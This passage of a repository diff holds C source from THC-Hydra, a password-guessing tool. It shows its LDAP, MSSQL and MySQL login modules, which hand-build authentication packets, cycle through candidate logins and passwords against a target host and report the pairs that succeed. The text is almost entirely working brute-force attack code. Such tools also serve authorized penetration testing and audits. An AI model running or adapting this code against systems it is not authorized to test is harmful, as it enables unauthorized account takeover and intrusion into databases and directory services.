miscptr = hydra_strrep(miscptr, "^USER^", login);
}
length = 12 + strlen(miscptr) + 4 + strlen("CRAM-MD5") + 2 + strlen(login) + 1 + strlen(buf2);
memset(buffer, 0, sizeof(buffer));
buffer[0] = 48;
buffer[1] = length - 2;
buffer[2] = 2;
buffer[3] = 1;
buffer[4] = counter % 256;
buffer[5] = 96;
buffer[6] = length - 7;
buffer[7] = 2;
buffer[8] = 1;
buffer[9] = version;
buffer[10] = 4;
buffer[11] = strlen(miscptr); /* DN */
memcpy(&buffer[12], miscptr, strlen(miscptr));
buffer[12 + strlen(miscptr)] = 163;
buffer[13 + strlen(miscptr)] = 2 + strlen("CRAM-MD5") + 2 + strlen(login) + 1 + strlen(buf2);
buffer[14 + strlen(miscptr)] = 4;
buffer[15 + strlen(miscptr)] = strlen("CRAM-MD5");
memcpy(&buffer[16 + strlen(miscptr)], "CRAM-MD5", strlen("CRAM-MD5"));
buffer[16 + strlen(miscptr) + strlen("CRAM-MD5")] = 4;
buffer[17 + strlen(miscptr) + strlen("CRAM-MD5")] = strlen(login) + 1 + strlen(buf2);
memcpy(&buffer[18 + strlen(miscptr) + strlen("CRAM-MD5")], login, strlen(login));
buffer[18 + strlen(miscptr) + strlen("CRAM-MD5") + strlen(login)] = ' ';
memcpy(&buffer[18 + strlen(miscptr) + strlen("CRAM-MD5") + strlen(login) + 1], buf2, strlen(buf2));
if (hydra_send(s, (char *) buffer, length, 0) < 0)
return 1;
free(buf);
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return 1;
} else {
if (ldap_auth_mechanism == AUTH_DIGESTMD5) {
char *ptr;
char buffer2[500];
int ind = 0;
ptr = strstr((char *) buf, "realm=");
counter++;
if (strstr(miscptr, "^USER^") != NULL) {
miscptr = hydra_strrep(miscptr, "^USER^", login);
}
sasl_digest_md5(buffer2, login, pass, ptr, miscptr, "ldap", NULL, 0, NULL);
if (buffer2 == NULL) {
free(buf);
return 3;
}
length = 26 + strlen(miscptr) + strlen("DIGEST-MD5") + strlen(buffer2);
memset(buffer, 0, sizeof(buffer));
ind = 0;
buffer[ind] = 48;
ind++;
buffer[ind] = 130;
ind++;
if (length - 4 > 255) {
buffer[ind] = 1;
ind++;
buffer[ind] = length - 256 - 4;
ind++;
} else {
buffer[ind] = 0;
ind++;
buffer[ind] = length - 4;
ind++;
}
buffer[ind] = 2;
ind++;
buffer[ind] = 1;
ind++;
buffer[ind] = counter % 256;
ind++;
buffer[ind] = 96; /*0x60 */
ind++;
buffer[ind] = 130;
ind++;
if (length - 7 - 4 > 255) {
buffer[ind] = 1;
ind++;
buffer[ind] = length - 256 - 11;
ind++;
} else {
buffer[ind] = 0;
ind++;
buffer[ind] = length - 11;
ind++;
}
buffer[ind] = 2;
ind++;
buffer[ind] = 1;
ind++;
buffer[ind] = version;
ind++;
buffer[ind] = 4;
ind++;
buffer[ind] = strlen(miscptr);
ind++;
memcpy(&buffer[ind], miscptr, strlen(miscptr));
/*DN*/ buffer[ind + strlen(miscptr)] = 163; //0xa3
ind++;
buffer[ind + strlen(miscptr)] = 130; //0x82
ind++;
if (strlen(buffer2) + 6 + strlen("DIGEST-MD5") > 255) {
buffer[ind + strlen(miscptr)] = 1;
ind++;
buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen("DIGEST-MD5") - 256;
} else {
buffer[ind + strlen(miscptr)] = 0;
ind++;
buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen("DIGEST-MD5");
}
ind++;
buffer[ind + strlen(miscptr)] = 4;
ind++;
buffer[ind + strlen(miscptr)] = strlen("DIGEST-MD5");
ind++;
memcpy(&buffer[ind + strlen(miscptr)], "DIGEST-MD5", strlen("DIGEST-MD5"));
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 4;
ind++;
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 130;
ind++;
if (strlen(buffer2) > 255) {
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 1;
ind++;
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = strlen(buffer2) - 256;
} else {
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 0;
ind++;
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = strlen(buffer2);
}
ind++;
memcpy(&buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")], buffer2, strlen(buffer2));
ind++;
if (hydra_send(s, (char *) buffer, length, 0) < 0)
return 1;
free(buf);
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return 1;
}
}
#endif
/* success is: 0a 01 00 - failure is: 0a 01 31 */
if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) {
hydra_report_found_host(port, ip, "ldap", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 7) {
hydra_report(stderr, "[ERROR] Unknown authentication method\n");
free(buf);
hydra_child_exit(2);
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 53) {
if (verbose)
hydra_report(stderr, "[VERBOSE] Server unwilling to perform action, maybe deny by server config or too busy when tried login: %s password: %s\n", login, pass);
free(buf);
return 1;
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 2) {
hydra_report(stderr, "[ERROR] Invalid protocol version, you tried ldap%c, better try ldap%c\n", version + '0', version == 2 ? '3' : '2');
free(buf);
hydra_child_exit(2);
sleep(1);
hydra_child_exit(2);
}
//0 0x30, 0x84, 0x20, 0x20, 0x20, 0x10, 0x02, 0x01,
//8 0x01, 0x61, 0x84, 0x20, 0x20, 0x20, 0x07, 0x0a,
//16 0x01, 0x20, 0x04, 0x20, 0x04, 0x20, 0x00, 0x00,
// this is for w2k8 active directory ldap auth
if (buf[0] == 48 && buf[1] == 132) {
if (buf[9] == 0x61 && buf[1] == 0x84) {
if (buf[17] == 0 || buf[17] == 0x20) {
hydra_report_found_host(port, ip, "ldap", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
} else {
if (buf[9] != 49 && buf[9] != 2 && buf[9] != 53) {
hydra_report(stderr, "[ERROR] Uh, unknown LDAP response! Please report this: \n");
print_hex((unsigned char *) buf, 24);
free(buf);
return 3;
}
}
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_ldap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char version, int auth_method) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_LDAP, mysslport = PORT_LDAP_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
counter = 1;
if (tls_required) {
/* Start TLS operation OID = 1.3.6.1.4.1.1466.20037 according to RFC 2830 */
char confidentiality_required[] = "\x30\x1d\x02\x01\x01\x77\x18\x80\x16\x31\x2e\x33\x2e\x36\x2e\x31\x2e\x34\x2e\x31\x2e\x31\x34\x36\x36\x2e\x32\x30\x30\x33\x37";
if (hydra_send(sock, confidentiality_required, strlen(confidentiality_required), 0) < 0)
hydra_child_exit(1);
if ((buf = (unsigned char *) hydra_receive_line(sock)) == NULL)
hydra_child_exit(1);
if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) {
/* TLS option negociation goes well, now trying to connect */
if ((hydra_connect_to_ssl(sock) == -1) && verbose) {
hydra_report(stderr, "[ERROR] Can't use TLS\n");
hydra_child_exit(1);
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
counter++;
}
} else {
hydra_report(stderr, "[ERROR] Can't use TLS %s\n", buf);
hydra_child_exit(1);
}
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_ldap(sock, ip, port, options, miscptr, fp, version, auth_method);
counter++;
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
void service_ldap2(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 2, AUTH_CLEAR);
}
void service_ldap3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_CLEAR);
}
void service_ldap3_cram_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_CRAMMD5);
}
void service_ldap3_digest_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_DIGESTMD5);
}
int service_ldap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

BIN
hydra-logo.ico Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 37 KiB

1
hydra-logo.rc Normal file
View file

@ -0,0 +1 @@
1 ICON "hydra-logo.ico"

1278
hydra-mod.c Normal file
View file

File diff suppressed because it is too large Load diff

61
hydra-mod.h Normal file
View file

@ -0,0 +1,61 @@
#ifndef _HYDRA_MOD_H
#define _HYDRA_MOD_H
#include "hydra.h"
extern void hydra_child_exit(int code);
extern void hydra_register_socket(int s);
extern char *hydra_get_next_pair();
extern char *hydra_get_next_login();
extern char *hydra_get_next_password();
extern void hydra_completed_pair();
extern void hydra_completed_pair_found();
extern void hydra_completed_pair_skip();
extern void hydra_report_found(int port, char *svc, FILE * fp);
extern void hydra_report_pass_found(int port, char *ip, char *svc, FILE * fp);
extern void hydra_report_found_host(int port, char *ip, char *svc, FILE * fp);
extern void hydra_report_found_host_msg(int port, char *ip, char *svc, FILE * fp, char *msg);
extern void hydra_report_debug(FILE *st, char *format, ...);
extern int hydra_connect_to_ssl(int socket);
extern int hydra_connect_ssl(char *host, int port);
extern int hydra_connect_tcp(char *host, int port);
extern int hydra_connect_udp(char *host, int port);
extern int hydra_disconnect(int socket);
extern int hydra_data_ready(int socket);
extern int hydra_recv(int socket, char *buf, int length);
extern int hydra_recv_nb(int socket, char *buf, int length);
extern char *hydra_receive_line(int socket);
extern int hydra_send(int socket, char *buf, int size, int options);
extern int make_to_lower(char *buf);
extern unsigned char hydra_conv64(unsigned char in);
extern void hydra_tobase64(unsigned char *buf, int buflen, int bufsize);
extern void hydra_dump_asciihex(unsigned char *string, int length);
extern void hydra_set_srcport(int port);
extern char *hydra_address2string(char *address);
extern char *hydra_strcasestr(const char *haystack, const char *needle);
extern void hydra_dump_data(unsigned char *buf, int len, char *text);
extern int hydra_memsearch(char *haystack, int hlen, char *needle, int nlen);
extern char *hydra_strrep(char *string, char *oldpiece, char *newpiece);
#ifdef HAVE_PCRE
int hydra_string_match(char *str, const char *regex);
#endif
char *hydra_string_replace(const char *string, const char *substr, const char *replacement);
int debug;
int verbose;
int waittime;
int port;
int use_proxy;
int found;
char proxy_string_ip[36];
int proxy_string_port;
char proxy_string_type[10];
char *proxy_authentication;
char *cmdlinetarget;
typedef int BOOL;
#define hydra_report fprintf
#endif

168
hydra-mssql.c Normal file
View file

@ -0,0 +1,168 @@
#include "hydra-mod.h"
#define MSLEN 30
extern char *HYDRA_EXIT;
char *buf;
unsigned char p_hdr[] =
"\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00";
unsigned char p_pk2[] =
"\x30\x30\x30\x30\x30\x30\x61\x30\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x20\x18\x81\xb8\x2c\x08\x03"
"\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x73\x71\x75\x65\x6c\x64\x61"
"\x20\x31\x2e\x30\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00";
unsigned char p_pk3[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x04\x02\x00\x00\x4d\x53\x44"
"\x42\x4c\x49\x42\x00\x00\x00\x07\x06\x00\x00" "\x00\x00\x0d\x11\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00";
unsigned char p_lng[] =
"\x02\x01\x00\x47\x00\x00\x02\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x30\x30\x30\x00\x00" "\x00\x03\x00\x00\x00";
int start_mssql(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[1024];
char ms_login[MSLEN + 1];
char ms_pass[MSLEN + 1];
unsigned char len_login, len_pass;
int ret = -1;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (strlen(login) > MSLEN)
login[MSLEN - 1] = 0;
if (strlen(pass) > MSLEN)
pass[MSLEN - 1] = 0;
len_login = strlen(login);
len_pass = strlen(pass);
memset(ms_login, 0, MSLEN + 1);
memset(ms_pass, 0, MSLEN + 1);
strcpy(ms_login, login);
strcpy(ms_pass, pass);
memset(buffer, 0, sizeof(buffer));
memcpy(buffer, p_hdr, 39);
memcpy(buffer + 39, ms_login, MSLEN);
memcpy(buffer + MSLEN + 39, &len_login, 1);
memcpy(buffer + MSLEN + 1 + 39, ms_pass, MSLEN);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN, &len_pass, 1);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1, p_pk2, 110);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110, &len_pass, 1);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1, ms_pass, MSLEN);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN, p_pk3, 270);
if (hydra_send(s, buffer, MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN + 270, 0) < 0)
return 1;
if (hydra_send(s, (char *) p_lng, 71, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret = hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 10 && buffer[8] == '\xe3') {
hydra_report_found_host(port, ip, "mssql", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
void service_mssql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_MSSQL, mysslport = PORT_MSSQL_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = start_mssql(sock, ip, port, options, miscptr, fp);
hydra_disconnect(sock);
break;
case 2: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_mssql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

429
hydra-mysql.c Normal file
View file

@ -0,0 +1,429 @@
/* mysql 3.2x.x to 4.x support - by mcbethh (at) u-n-f (dot) com */
/* david (dot) maciejak (at) gmail (dot) com for using libmysqlclient-dev, adding support for mysql version 5.x */
#include "hydra-mod.h"
#ifndef HAVE_MATH_H
#include <stdio.h>
void dummy_mysql() {
printf("\n");
}
void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
printf("\n");
}
#else
#include <math.h>
#define DEFAULT_DB "mysql"
#ifndef LIBMYSQLCLIENT
#else
#include <mysql/mysql.h>
MYSQL *mysql = NULL;
#endif
void hydra_hash_password(unsigned long *result, const char *password);
char *hydra_scramble(char *to, const char *message, const char *password);
extern int internal__hydra_recv(int socket, char *buf, int length);
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
char mysqlsalt[9];
/* modified hydra_receive_line, I've striped code which changed every 0x00 to 0x20 */
char *hydra_mysql_receive_line(int socket) {
char buf[300], *buff, *buff2;
int i = 0, j = 0;
buff = malloc(sizeof(buf));
if (buff == NULL)
return NULL;
memset(buff, 0, sizeof(buf));
i = hydra_data_ready_timed(socket, (long) waittime, 0);
if (i > 0) {
if ((i = internal__hydra_recv(socket, buff, sizeof(buf))) < 0) {
free(buff);
return NULL;
}
}
if (i <= 0) {
if (debug)
hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END\n", buff);
free(buff);
return NULL;
}
j = 1;
while (hydra_data_ready(socket) > 0 && j > 0) {
j = internal__hydra_recv(socket, buf, sizeof(buf));
if ((buff2 = realloc(buff, i + j)) == NULL) {
free(buff);
return NULL;
} else
buff = buff2;
memcpy(buff + i, &buf, j);
i = i + j;
}
if (debug)
hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END\n", buff);
return buff;
}
/* check if valid mysql protocol, mysql version and read salt */
char hydra_mysql_init(int sock) {
char *server_version, *pos, *buf;
unsigned char protocol;
buf = hydra_mysql_receive_line(sock);
if (buf == NULL)
return 1;
protocol = buf[4];
if (protocol == 0xff) {
pos = &buf[6];
// *(strchr(pos, '.')) = '\0';
hydra_report(stderr, "[ERROR] %s\n", pos);
free(buf);
return 2;
}
if (protocol <= 10) {
free(buf);
return 2;
}
if (protocol > 10) {
fprintf(stderr, "[INFO] This is protocol version %d, only v10 is supported, not sure if it will work\n", protocol);
}
server_version = &buf[5];
pos = buf + strlen(server_version) + 10;
memcpy(mysqlsalt, pos, 9);
if (!strstr(server_version, "3.") && !strstr(server_version, "4.") && strstr(server_version, "5.")) {
#ifndef LIBMYSQLCLIENT
hydra_report(stderr, "[ERROR] Not an MySQL protocol or unsupported version,\ncheck configure to see if libmysql is found\n");
#endif
free(buf);
return 2;
}
free(buf);
return 0;
}
/* prepare response to server greeting */
char *hydra_mysql_prepare_auth(char *login, char *pass) {
unsigned char *response;
unsigned long login_len = strlen(login) > 32 ? 32 : strlen(login);
unsigned long response_len = 4 /* header */ +
2 /* client flags */ +
3 /* max packet len */ +
login_len + 1 + 8 /* scrambled password len */ ;
response = (unsigned char *) malloc(response_len + 4);
if (response == NULL) {
fprintf(stderr, "[ERROR] could not allocate memory\n");
return NULL;
}
memset(response, 0, response_len + 4);
*((unsigned long *) response) = response_len - 4;
response[3] = 0x01; /* packet number */
response[4] = 0x85;
response[5] = 0x24; /* client flags */
response[6] = response[7] = response[8] = 0x00; /* max packet */
memcpy(&response[9], login, login_len); /* login */
response[9 + login_len] = '\0'; /* null terminate login */
hydra_scramble((char *) &response[9 + login_len + 1], mysqlsalt, pass);
return (char *) response;
}
/* returns 0 if authentication succeed */
/* and 1 if failed */
char hydra_mysql_parse_response(unsigned char *response) {
unsigned long response_len = *((unsigned long *) response) & 0xffffff;
if (response_len < 4)
return 0;
if (response[4] == 0xff)
return 1;
return 0;
}
char hydra_mysql_send_com_quit(int sock) {
char com_quit_packet[5] = { 0x01, 0x00, 0x00, 0x00, 0x01 };
hydra_send(sock, com_quit_packet, 5, 0);
return 0;
}
int start_mysql(int sock, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *response = NULL, *login = NULL, *pass = NULL;
unsigned long response_len;
char res = 0;
char database[256];
login = hydra_get_next_login();
pass = hydra_get_next_password();
if (miscptr)
strncpy(database, miscptr, sizeof(database));
else {
strncpy(database, DEFAULT_DB, sizeof(database));
if (verbose)
hydra_report(stderr, "[VERBOSE] using default db 'mysql'\n");
}
/* read server greeting */
res = hydra_mysql_init(sock);
if (res == 2) {
/* old reversing protocol trick did not work */
/* try using the libmysql client if available */
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
#ifdef LIBMYSQLCLIENT
if (mysql == NULL) {
mysql = mysql_init(NULL);
if (mysql == NULL) {
hydra_report(stderr, "[ERROR] Insufficient memory to allocate new mysql object\n");
return 1;
}
}
/*mysql_options(&mysql,MYSQL_OPT_COMPRESS,0); */
if (!mysql_real_connect(mysql, hydra_address2string(ip), login, pass, database, 0, NULL, 0)) {
int my_errno = mysql_errno(mysql);
if (debug)
hydra_report(stderr, "[ERROR] Failed to connect to database: %s\n", mysql_error(mysql));
/*
Error: 1049 SQLSTATE: 42000 (ER_BAD_DB_ERROR)
Message: Unknown database '%s'
*/
if (my_errno == 1049) {
hydra_report(stderr, "[ERROR] Unknown database: %s\n", database);
}
if (my_errno == 1251) {
hydra_report(stderr, "[ERROR] Client does not support authentication protocol requested by server\n");
}
/*
http://dev.mysql.com/doc/refman/5.0/en/error-messages-server.html
Error: 1044 SQLSTATE: 42000 (ER_DBACCESS_DENIED_ERROR)
Message: Access denied for user '%s'@'%s' to database '%s'
Error: 1045 SQLSTATE: 28000 (ER_ACCESS_DENIED_ERROR)
Message: Access denied for user '%s'@'%s' (using password: %s)
*/
//if the error is more critical, we just try to reconnect
//to the db later with the mysql_init
if ((my_errno != 1044) && (my_errno != 1045)) {
mysql_close(mysql);
mysql = NULL;
}
return 3;
}
hydra_report_found_host(port, ip, "mysql", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
mysql_close(mysql);
mysql = NULL;
return 3;
}
return 1;
#else
hydra_child_exit(2);
#endif
}
if (res == 1)
return 1;
/* prepare client authentication packet */
response = hydra_mysql_prepare_auth(login, pass);
if (response == NULL)
return 3;
response_len = *((unsigned long *) response) & 0xffffff;
/* send client auth packet */
/* dunny why, mysql IO code had problem reading my response. */
/* When I send response_len bytes, it always read response_len-4 bytes */
/* I fixed it just by sending 4 characters more. It is maybe not good */
/* coding style, but working :) */
if (hydra_send(sock, response, response_len + 4, 0) < 0) {
free(response);
return 1;
}
free(response);
/* read authentication response */
if ((response = hydra_mysql_receive_line(sock)) == NULL)
return 1;
res = hydra_mysql_parse_response((unsigned char *) response);
if (!res) {
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
hydra_report_found_host(port, ip, "mysql", fp);
hydra_completed_pair_found();
free(response);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(response);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
/* each try requires new connection */
return 1;
}
void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_MYSQL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0) {
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
}
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_mysql(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0) {
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
}
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#ifndef LIBMYSQLCLIENT
#endif
/************************************************************************/
/* code belowe is copied from mysql 3.23.57 source code (www.mysql.com) */
/* and slightly modified (removed not needed parts of code, changed */
/* data types) */
/************************************************************************/
struct hydra_rand_struct {
unsigned long seed1, seed2, max_value;
double max_value_dbl;
};
void hydra_randominit(struct hydra_rand_struct *rand_st, unsigned long seed1, unsigned long seed2) { /* For mysql 3.21.# */
rand_st->max_value = 0x3FFFFFFFL;
rand_st->max_value_dbl = (double) rand_st->max_value;
rand_st->seed1 = seed1 % rand_st->max_value;
rand_st->seed2 = seed2 % rand_st->max_value;
}
double hydra_rnd(struct hydra_rand_struct *rand_st) {
rand_st->seed1 = (rand_st->seed1 * 3 + rand_st->seed2) % rand_st->max_value;
rand_st->seed2 = (rand_st->seed1 + rand_st->seed2 + 33) % rand_st->max_value;
return (((double) rand_st->seed1) / rand_st->max_value_dbl);
}
void hydra_hash_password(unsigned long *result, const char *password) {
register unsigned long nr = 1345345333L, add = 7, nr2 = 0x12345671L;
unsigned long tmp;
for (; *password; password++) {
if (*password == ' ' || *password == '\t')
continue; /* skipp space in password */
tmp = (unsigned long) (unsigned char) *password;
nr ^= (((nr & 63) + add) * tmp) + (nr << 8);
nr2 += (nr2 << 8) ^ nr;
add += tmp;
}
result[0] = nr & (((unsigned long) 1L << 31) - 1L); /* Don't use sign bit (str2int) */ ;
result[1] = nr2 & (((unsigned long) 1L << 31) - 1L);
return;
}
char *hydra_scramble(char *to, const char *message, const char *password) {
struct hydra_rand_struct rand_st;
unsigned long hash_pass[2], hash_message[2];
char extra;
if (password && password[0]) {
char *to_start = to;
hydra_hash_password(hash_pass, password);
hydra_hash_password(hash_message, message);
hydra_randominit(&rand_st, hash_pass[0] ^ hash_message[0], hash_pass[1] ^ hash_message[1]);
while (*message++)
*to++ = (char) (floor(hydra_rnd(&rand_st) * 31) + 64);
extra = (char) (floor(hydra_rnd(&rand_st) * 31));
while (to_start != to)
*(to_start++) ^= extra;
}
*to = 0;
return to;
}
#endif
int service_mysql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
